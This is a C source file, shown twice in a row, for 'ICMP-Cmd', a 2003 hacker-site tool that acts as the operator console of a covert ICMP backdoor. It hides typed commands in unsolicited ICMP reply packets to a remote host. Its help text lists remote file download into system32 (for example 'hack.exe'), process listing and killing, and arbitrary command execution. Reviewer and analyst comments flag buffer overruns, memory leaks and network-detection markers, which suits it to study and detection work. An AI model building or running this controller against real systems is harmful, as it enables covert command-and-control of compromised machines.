#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib,"ws2_32.lib")
// Line typed by the operator; fill_icmp_data() copies it into the packet payload.
// NOTE(review): main() passes 1024 to fgets() for this 256-byte buffer.
char SendMsg[256];
/*
 * IPv4 header as overlaid on a received datagram. Only h_len is read in this
 * file (decode_resp).
 * NOTE(review): the two 4-bit fields are declared as unsigned int bitfields,
 * so the offsets of the members after them are compiler-dependent - confirm
 * before reading any other field through this struct.
 */
typedef struct iphdr {
unsigned int h_len:4; // 4-bit header length, in 32-bit words (decode_resp multiplies by 4)
unsigned int version:4; // 4-bit IP version
unsigned char tos; // 8-bit type of service
unsigned short total_len; // 16-bit total length
unsigned short ident; // 16-bit identification
unsigned short frag_and_flags; // flags and fragment offset
unsigned char ttl; // 8-bit time to live
unsigned char proto; // 8-bit protocol (TCP, UDP, ...)
unsigned short checksum; // 16-bit IP header checksum
unsigned int sourceIP; // 32-bit source address
unsigned int destIP; // 32-bit destination address
}IpHeader;
/* ICMP header used for both the outgoing packet and the parsed reply. */
typedef struct _ihdr
{
BYTE i_type;// 8-bit ICMP type
BYTE i_code; // 8-bit ICMP code
USHORT i_cksum;// 16-bit checksum
USHORT i_id;// identifier (fill_icmp_data stores the process id here)
USHORT i_seq;// sequence number (1234 on send, 4321 expected on receive)
ULONG timestamp;// tick count at send time
} IcmpHeader;
#define STATUS_FAILED 0xFFFF
// Size of the heap buffers main() allocates for sending and receiving.
#define MAX_PACKET 2000
// Receives the payload copied out of a reply by decode_resp().
char arg[1450];
// Zero-initialised allocation from the process heap; this file has no matching free.
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))
void fill_icmp_data(char *, int);
USHORT checksum(USHORT *, int);
void decode_resp(char *,int ,struct sockaddr_in *);// parses one received ICMP datagram
void help(void);
void usage(char * prog);
/*
 * Operator console of the ICMP-Cmd client: reads a line from stdin, places it
 * in the payload of an ICMP packet built by fill_icmp_data() (type 0, code 0)
 * and sends it to argv[1] over a raw socket, then prints the datagrams that
 * decode_resp() accepts for roughly one second.
 *
 * Analyst note: the traffic this produces is an ICMP type 0 packet that no
 * echo request preceded, carrying readable command text as payload; that
 * combination is what a network monitor can key on.
 *
 * Returns 0 on every path that returns; exits through ExitProcess() on the
 * quit command and on WSAStartup failure.
 */
int main(int argc, char *argv[])
{
char *ICMP_DEST_IP; // destination address string, taken from argv[1]
char *recvbuf;
if(argc!=2)
{
usage(argv[0]);
return 0;
}
ICMP_DEST_IP=argv[1];// the single argument is the remote IP
WSADATA wsaData;
SOCKET sockRaw;
struct sockaddr_in dest,from;
int datasize;
int fromlen=sizeof(from);
char *icmp_data;
if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
{
fprintf(stderr, "WSAStartup failed: %d\n", GetLastError());
ExitProcess(STATUS_FAILED);
}
// NOTE(review): the socket() result is not compared with INVALID_SOCKET before
// it is used below, and the setsockopt() return values are ignored.
sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout=1000;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout));
timeout=4000;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout));
memset(&dest,0,sizeof(dest));
// NOTE(review): inet_addr() reports a malformed address through its return
// value, which is not checked here.
dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);
dest.sin_family=AF_INET;
usage(argv[0]); // printed a second time as the start-up banner
__try{
for(;;){
printf("ICMP-CMD>");
// NOTE(review): SendMsg is declared as char[256] but 1024 is passed as the
// limit, so a long input line overruns the buffer; the fgets() result is
// also unchecked, so on EOF the previous contents are processed again.
fgets(SendMsg,1024,stdin);// read one line into SendMsg
// ExitProcess() does not return, so the __finally block below is not reached
// on the quit path.
if(!strcmp(SendMsg,"Q\n")||!strcmp(SendMsg,"q\n"))ExitProcess(0);
if(!strcmp(SendMsg,"\n"))continue;
if(!strcmp(SendMsg,"H\n")||!strcmp(SendMsg,"h\n")){help();continue;}
// Lines starting with "http://" must also contain a '-' somewhere.
if(!memcmp(SendMsg,"http://",7))
if(!strstr(SendMsg,"-")){printf("\nFileName Error. Use \"-FileName\"\n");continue;}
// Packet length = typed line (including its newline) + ICMP header.
datasize=strlen(SendMsg);
datasize+=sizeof(IcmpHeader);
printf("ICMP packet size is %d",datasize);
// NOTE(review): both buffers are allocated on every iteration, never checked
// for NULL and never released, so each command leaks 2 * MAX_PACKET bytes.
icmp_data= (char*)xmalloc(MAX_PACKET);
recvbuf= (char *)xmalloc(MAX_PACKET);
memset(icmp_data,0, MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
// The checksum field must be zero while the checksum is computed.
((IcmpHeader *)icmp_data)->i_cksum=0;
((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize);
int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));
if (bwrote == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
fprintf(stderr,"sendto failed: %d\n",WSAGetLastError());
}
// A failed send also lands here, because the error branch above does not
// leave the loop; the return happens inside __try (under MSVC structured
// exception handling the __finally block is expected to run - confirm).
if (bwrote<datasize ) {// fewer bytes sent than requested: leave main
return 0;
}
printf("\nSend Packet to %s Success!\n",argv[1]);
DWORD start = GetTickCount();
// Collect replies until about 1000 ms have elapsed. The elapsed time is only
// tested between calls, and a single recvfrom() may block for the 4000 ms
// receive timeout set above.
for(;;){
if((GetTickCount() - start) >= 1000) break;
memset(recvbuf,0,MAX_PACKET);
// NOTE(review): fromlen is an in/out argument and is not reset to
// sizeof(from) before each call.
int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen);
if(bread == SOCKET_ERROR)
{
if(WSAGetLastError() == WSAETIMEDOUT)
{
printf("timed out\n");
break;
}
fprintf(stderr, "recvfrom failed: %d\n", WSAGetLastError());
break;
}
// Every datagram delivered to the raw socket is handed to the parser,
// whatever its sender; decode_resp() filters on the sequence field only.
decode_resp(recvbuf, bread, &from);
}
}//end for
}//end try
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
return 0;
}
/*
 * One's-complement checksum over `size` bytes starting at `buffer`.
 *
 * buffer - data to sum, read as 16-bit words in host byte order
 * size   - length in bytes; an odd trailing byte is added as an 8-bit value
 *
 * Returns the complement of the folded 16-bit sum. The caller is expected to
 * have zeroed the checksum field inside the buffer beforehand.
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long sum = 0;
    const USHORT *word = buffer;
    int remaining;

    /* Add up every complete 16-bit word. */
    for (remaining = size; remaining > 1; remaining -= 2) {
        sum += *word;
        word++;
    }

    /* A leftover byte is added on its own. */
    if (remaining != 0) {
        sum += *(const UCHAR *)word;
    }

    /* Fold the carries back into the low 16 bits, twice. */
    sum = (sum & 0xffff) + (sum >> 16);
    sum += sum >> 16;

    return (USHORT)~sum;
}
/*
 * Write the ICMP header and payload of an outgoing packet into icmp_data.
 *
 * icmp_data - destination buffer; must hold sizeof(IcmpHeader) plus
 *             sizeof(SendMsg) bytes, because the whole SendMsg array is
 *             copied regardless of how much of it is in use
 * datasize  - accepted but not used by this function
 *
 * Header values: type 0 and code 0, identifier = low 16 bits of the process
 * id, timestamp = current tick count, sequence = 1234. The checksum field is
 * left for the caller to fill in.
 *
 * Analyst note: the sequence value is stored without htons(), so on a
 * little-endian host it appears byte-swapped on the wire; together with
 * type 0 and a text payload it is a fixed marker of this tool's packets.
 */
void fill_icmp_data(char *icmp_data, int datasize)
{
    IcmpHeader *hdr = (IcmpHeader *)icmp_data;

    hdr->i_type = 0;
    hdr->i_code = 0;
    hdr->i_id = (USHORT)GetCurrentProcessId();
    hdr->timestamp = GetTickCount();
    hdr->i_seq = 1234;

    /* The payload starts directly after the header. */
    memcpy(icmp_data + sizeof(IcmpHeader), SendMsg, sizeof(SendMsg));
}
/*
 * Print the program banner and the one-line usage text to stdout.
 *
 * prog - program name shown in the usage line (main passes argv[0])
 */
void usage(char * prog)
{
    /* Fixed banner lines, emitted in one call. */
    fputs("\t\t=====Welcome to www.hackerxfiles.net======\n"
          "\n"
          "\t\t---[ ICMP-Cmd v1.0 beta, by gxisone ]---\n"
          "\t\t---[ E-mail: gxisone@hotmail.com ]---\n"
          "\t\t---[ 2003/8/15 ]---\n",
          stdout);
    printf("\t\tusage: %s RemoteIP\n", prog);
    fputs("\t\tCtrl+C or Q/q to Quite H/h for help\n", stdout);
}
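/*
 * Parse one datagram read from the raw ICMP socket and print its payload.
 *
 * buf   - received datagram, starting with the IPv4 header; this is
 *         untrusted network data
 * bytes - number of bytes recvfrom() reported for buf
 * from  - sender address reported by recvfrom()
 *
 * A datagram is treated as a reply only when its ICMP sequence field equals
 * 4321; anything else, including a datagram too short to hold both headers,
 * prints "Other ICMP Packets!". The payload is copied into the global `arg`
 * and printed as a string.
 *
 * Changes from the earlier version: the length reported by recvfrom() is
 * checked before any header field is read, and the copy into `arg` is limited
 * to the bytes actually received and to sizeof(arg) - 1, so `arg` always ends
 * in a NUL before it reaches printf("%s").
 *
 * NOTE(review): the sequence value is the only filter, so any host that can
 * deliver an ICMP datagram with that value gets its payload printed. The
 * payload is written to the console unfiltered, control characters included.
 */
void decode_resp(char *buf, int bytes, struct sockaddr_in *from)
{
    /* Smallest legal IPv4 header. sizeof(IpHeader) is not used for this
     * because the bitfield layout of that struct is compiler-dependent. */
    const int min_ip_header = 20;
    IpHeader *iphdr;
    IcmpHeader *icmphdr;
    unsigned short iphdrlen;
    int payload_len;

    memset(arg, 0, sizeof(arg));

    /* The first byte must be present before h_len can be trusted. */
    if (buf == NULL || from == NULL || bytes < min_ip_header) {
        printf("Other ICMP Packets!\n");
        return;
    }

    iphdr = (IpHeader *)buf;
    iphdrlen = iphdr->h_len * 4;

    /* Reject a header length below the minimum, and a datagram that ends
     * before the ICMP header does. */
    if (iphdrlen < min_ip_header ||
        bytes < (int)(iphdrlen + sizeof(IcmpHeader))) {
        printf("Other ICMP Packets!\n");
        return;
    }

    icmphdr = (IcmpHeader *)(buf + iphdrlen);
    if (icmphdr->i_seq != 4321) {
        printf("Other ICMP Packets!\n");
        return;
    }

    printf("%d bytes from %s:", bytes, inet_ntoa(from->sin_addr));
    printf(" IcmpType %d", icmphdr->i_type);
    printf(" IcmpCode %d", icmphdr->i_code);
    printf("\n");

    /* Copy only what was received, and keep the last byte of arg as NUL. */
    payload_len = bytes - (int)iphdrlen - (int)sizeof(IcmpHeader);
    if (payload_len > (int)sizeof(arg) - 1) {
        payload_len = (int)sizeof(arg) - 1;
    }
    if (payload_len > 0) {
        memcpy(arg, buf + iphdrlen + sizeof(IcmpHeader), (size_t)payload_len);
    }
    printf("%s", arg);
}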
/*
 * Print the list of command forms shown to the operator for the H/h input.
 * The text is static; how the remote side interprets each form is not
 * visible in this file.
 */
void help(void)
{
    fputs("\n"
          "[http://127.0.0.1/hack.exe -admin.exe] (Download Files. Parth is \\\\system32)\n"
          "[pslist] (List the Process)\n"
          "[pskill ID] (Kill the Process)\n"
          "Command (run the command)\n"
          "\n",
          stdout);
}
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib,"ws2_32.lib")
// Line typed by the operator; fill_icmp_data() copies it into the packet payload.
// NOTE(review): main() passes 1024 to fgets() for this 256-byte buffer.
char SendMsg[256];
/*
 * IPv4 header as overlaid on a received datagram. Only h_len is read in this
 * file (decode_resp).
 * NOTE(review): the two 4-bit fields are declared as unsigned int bitfields,
 * so the offsets of the members after them are compiler-dependent - confirm
 * before reading any other field through this struct.
 */
typedef struct iphdr {
unsigned int h_len:4; // 4-bit header length, in 32-bit words (decode_resp multiplies by 4)
unsigned int version:4; // 4-bit IP version
unsigned char tos; // 8-bit type of service
unsigned short total_len; // 16-bit total length
unsigned short ident; // 16-bit identification
unsigned short frag_and_flags; // flags and fragment offset
unsigned char ttl; // 8-bit time to live
unsigned char proto; // 8-bit protocol (TCP, UDP, ...)
unsigned short checksum; // 16-bit IP header checksum
unsigned int sourceIP; // 32-bit source address
unsigned int destIP; // 32-bit destination address
}IpHeader;
/* ICMP header used for both the outgoing packet and the parsed reply. */
typedef struct _ihdr
{
BYTE i_type;// 8-bit ICMP type
BYTE i_code; // 8-bit ICMP code
USHORT i_cksum;// 16-bit checksum
USHORT i_id;// identifier (fill_icmp_data stores the process id here)
USHORT i_seq;// sequence number (1234 on send, 4321 expected on receive)
ULONG timestamp;// tick count at send time
} IcmpHeader;
#define STATUS_FAILED 0xFFFF
// Size of the heap buffers main() allocates for sending and receiving.
#define MAX_PACKET 2000
// Receives the payload copied out of a reply by decode_resp().
char arg[1450];
// Zero-initialised allocation from the process heap; this file has no matching free.
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))
void fill_icmp_data(char *, int);
USHORT checksum(USHORT *, int);
void decode_resp(char *,int ,struct sockaddr_in *);// parses one received ICMP datagram
void help(void);
void usage(char * prog);
/*
 * Operator console of the ICMP-Cmd client: reads a line from stdin, places it
 * in the payload of an ICMP packet built by fill_icmp_data() (type 0, code 0)
 * and sends it to argv[1] over a raw socket, then prints the datagrams that
 * decode_resp() accepts for roughly one second.
 *
 * Analyst note: the traffic this produces is an ICMP type 0 packet that no
 * echo request preceded, carrying readable command text as payload; that
 * combination is what a network monitor can key on.
 *
 * Returns 0 on every path that returns; exits through ExitProcess() on the
 * quit command and on WSAStartup failure.
 */
int main(int argc, char *argv[])
{
char *ICMP_DEST_IP; // destination address string, taken from argv[1]
char *recvbuf;
if(argc!=2)
{
usage(argv[0]);
return 0;
}
ICMP_DEST_IP=argv[1];// the single argument is the remote IP
WSADATA wsaData;
SOCKET sockRaw;
struct sockaddr_in dest,from;
int datasize;
int fromlen=sizeof(from);
char *icmp_data;
if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
{
fprintf(stderr, "WSAStartup failed: %d\n", GetLastError());
ExitProcess(STATUS_FAILED);
}
// NOTE(review): the socket() result is not compared with INVALID_SOCKET before
// it is used below, and the setsockopt() return values are ignored.
sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout=1000;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout));
timeout=4000;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout));
memset(&dest,0,sizeof(dest));
// NOTE(review): inet_addr() reports a malformed address through its return
// value, which is not checked here.
dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);
dest.sin_family=AF_INET;
usage(argv[0]); // printed a second time as the start-up banner
__try{
for(;;){
printf("ICMP-CMD>");
// NOTE(review): SendMsg is declared as char[256] but 1024 is passed as the
// limit, so a long input line overruns the buffer; the fgets() result is
// also unchecked, so on EOF the previous contents are processed again.
fgets(SendMsg,1024,stdin);// read one line into SendMsg
// ExitProcess() does not return, so the __finally block below is not reached
// on the quit path.
if(!strcmp(SendMsg,"Q\n")||!strcmp(SendMsg,"q\n"))ExitProcess(0);
if(!strcmp(SendMsg,"\n"))continue;
if(!strcmp(SendMsg,"H\n")||!strcmp(SendMsg,"h\n")){help();continue;}
// Lines starting with "http://" must also contain a '-' somewhere.
if(!memcmp(SendMsg,"http://",7))
if(!strstr(SendMsg,"-")){printf("\nFileName Error. Use \"-FileName\"\n");continue;}
// Packet length = typed line (including its newline) + ICMP header.
datasize=strlen(SendMsg);
datasize+=sizeof(IcmpHeader);
printf("ICMP packet size is %d",datasize);
// NOTE(review): both buffers are allocated on every iteration, never checked
// for NULL and never released, so each command leaks 2 * MAX_PACKET bytes.
icmp_data= (char*)xmalloc(MAX_PACKET);
recvbuf= (char *)xmalloc(MAX_PACKET);
memset(icmp_data,0, MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
// The checksum field must be zero while the checksum is computed.
((IcmpHeader *)icmp_data)->i_cksum=0;
((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize);
int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));
if (bwrote == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
fprintf(stderr,"sendto failed: %d\n",WSAGetLastError());
}
// A failed send also lands here, because the error branch above does not
// leave the loop; the return happens inside __try (under MSVC structured
// exception handling the __finally block is expected to run - confirm).
if (bwrote<datasize ) {// fewer bytes sent than requested: leave main
return 0;
}
printf("\nSend Packet to %s Success!\n",argv[1]);
DWORD start = GetTickCount();
// Collect replies until about 1000 ms have elapsed. The elapsed time is only
// tested between calls, and a single recvfrom() may block for the 4000 ms
// receive timeout set above.
for(;;){
if((GetTickCount() - start) >= 1000) break;
memset(recvbuf,0,MAX_PACKET);
// NOTE(review): fromlen is an in/out argument and is not reset to
// sizeof(from) before each call.
int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen);
if(bread == SOCKET_ERROR)
{
if(WSAGetLastError() == WSAETIMEDOUT)
{
printf("timed out\n");
break;
}
fprintf(stderr, "recvfrom failed: %d\n", WSAGetLastError());
break;
}
// Every datagram delivered to the raw socket is handed to the parser,
// whatever its sender; decode_resp() filters on the sequence field only.
decode_resp(recvbuf, bread, &from);
}
}//end for
}//end try
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
return 0;
}
/*
 * One's-complement checksum over `size` bytes starting at `buffer`.
 *
 * buffer - data to sum, read as 16-bit words in host byte order
 * size   - length in bytes; an odd trailing byte is added as an 8-bit value
 *
 * Returns the complement of the folded 16-bit sum. The caller is expected to
 * have zeroed the checksum field inside the buffer beforehand.
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long sum = 0;
    const USHORT *word = buffer;
    int remaining;

    /* Add up every complete 16-bit word. */
    for (remaining = size; remaining > 1; remaining -= 2) {
        sum += *word;
        word++;
    }

    /* A leftover byte is added on its own. */
    if (remaining != 0) {
        sum += *(const UCHAR *)word;
    }

    /* Fold the carries back into the low 16 bits, twice. */
    sum = (sum & 0xffff) + (sum >> 16);
    sum += sum >> 16;

    return (USHORT)~sum;
}
/*
 * Write the ICMP header and payload of an outgoing packet into icmp_data.
 *
 * icmp_data - destination buffer; must hold sizeof(IcmpHeader) plus
 *             sizeof(SendMsg) bytes, because the whole SendMsg array is
 *             copied regardless of how much of it is in use
 * datasize  - accepted but not used by this function
 *
 * Header values: type 0 and code 0, identifier = low 16 bits of the process
 * id, timestamp = current tick count, sequence = 1234. The checksum field is
 * left for the caller to fill in.
 *
 * Analyst note: the sequence value is stored without htons(), so on a
 * little-endian host it appears byte-swapped on the wire; together with
 * type 0 and a text payload it is a fixed marker of this tool's packets.
 */
void fill_icmp_data(char *icmp_data, int datasize)
{
    IcmpHeader *hdr = (IcmpHeader *)icmp_data;

    hdr->i_type = 0;
    hdr->i_code = 0;
    hdr->i_id = (USHORT)GetCurrentProcessId();
    hdr->timestamp = GetTickCount();
    hdr->i_seq = 1234;

    /* The payload starts directly after the header. */
    memcpy(icmp_data + sizeof(IcmpHeader), SendMsg, sizeof(SendMsg));
}
/*
 * Print the program banner and the one-line usage text to stdout.
 *
 * prog - program name shown in the usage line (main passes argv[0])
 */
void usage(char * prog)
{
    /* Fixed banner lines, emitted in one call. */
    fputs("\t\t=====Welcome to www.hackerxfiles.net======\n"
          "\n"
          "\t\t---[ ICMP-Cmd v1.0 beta, by gxisone ]---\n"
          "\t\t---[ E-mail: gxisone@hotmail.com ]---\n"
          "\t\t---[ 2003/8/15 ]---\n",
          stdout);
    printf("\t\tusage: %s RemoteIP\n", prog);
    fputs("\t\tCtrl+C or Q/q to Quite H/h for help\n", stdout);
}
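/*
 * Parse one datagram read from the raw ICMP socket and print its payload.
 *
 * buf   - received datagram, starting with the IPv4 header; this is
 *         untrusted network data
 * bytes - number of bytes recvfrom() reported for buf
 * from  - sender address reported by recvfrom()
 *
 * A datagram is treated as a reply only when its ICMP sequence field equals
 * 4321; anything else, including a datagram too short to hold both headers,
 * prints "Other ICMP Packets!". The payload is copied into the global `arg`
 * and printed as a string.
 *
 * Changes from the earlier version: the length reported by recvfrom() is
 * checked before any header field is read, and the copy into `arg` is limited
 * to the bytes actually received and to sizeof(arg) - 1, so `arg` always ends
 * in a NUL before it reaches printf("%s").
 *
 * NOTE(review): the sequence value is the only filter, so any host that can
 * deliver an ICMP datagram with that value gets its payload printed. The
 * payload is written to the console unfiltered, control characters included.
 */
void decode_resp(char *buf, int bytes, struct sockaddr_in *from)
{
    /* Smallest legal IPv4 header. sizeof(IpHeader) is not used for this
     * because the bitfield layout of that struct is compiler-dependent. */
    const int min_ip_header = 20;
    IpHeader *iphdr;
    IcmpHeader *icmphdr;
    unsigned short iphdrlen;
    int payload_len;

    memset(arg, 0, sizeof(arg));

    /* The first byte must be present before h_len can be trusted. */
    if (buf == NULL || from == NULL || bytes < min_ip_header) {
        printf("Other ICMP Packets!\n");
        return;
    }

    iphdr = (IpHeader *)buf;
    iphdrlen = iphdr->h_len * 4;

    /* Reject a header length below the minimum, and a datagram that ends
     * before the ICMP header does. */
    if (iphdrlen < min_ip_header ||
        bytes < (int)(iphdrlen + sizeof(IcmpHeader))) {
        printf("Other ICMP Packets!\n");
        return;
    }

    icmphdr = (IcmpHeader *)(buf + iphdrlen);
    if (icmphdr->i_seq != 4321) {
        printf("Other ICMP Packets!\n");
        return;
    }

    printf("%d bytes from %s:", bytes, inet_ntoa(from->sin_addr));
    printf(" IcmpType %d", icmphdr->i_type);
    printf(" IcmpCode %d", icmphdr->i_code);
    printf("\n");

    /* Copy only what was received, and keep the last byte of arg as NUL. */
    payload_len = bytes - (int)iphdrlen - (int)sizeof(IcmpHeader);
    if (payload_len > (int)sizeof(arg) - 1) {
        payload_len = (int)sizeof(arg) - 1;
    }
    if (payload_len > 0) {
        memcpy(arg, buf + iphdrlen + sizeof(IcmpHeader), (size_t)payload_len);
    }
    printf("%s", arg);
}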
/*
 * Print the list of command forms shown to the operator for the H/h input.
 * The text is static; how the remote side interprets each form is not
 * visible in this file.
 */
void help(void)
{
    fputs("\n"
          "[http://127.0.0.1/hack.exe -admin.exe] (Download Files. Parth is \\\\system32)\n"
          "[pslist] (List the Process)\n"
          "[pskill ID] (Kill the Process)\n"
          "Command (run the command)\n"
          "\n",
          stdout);
}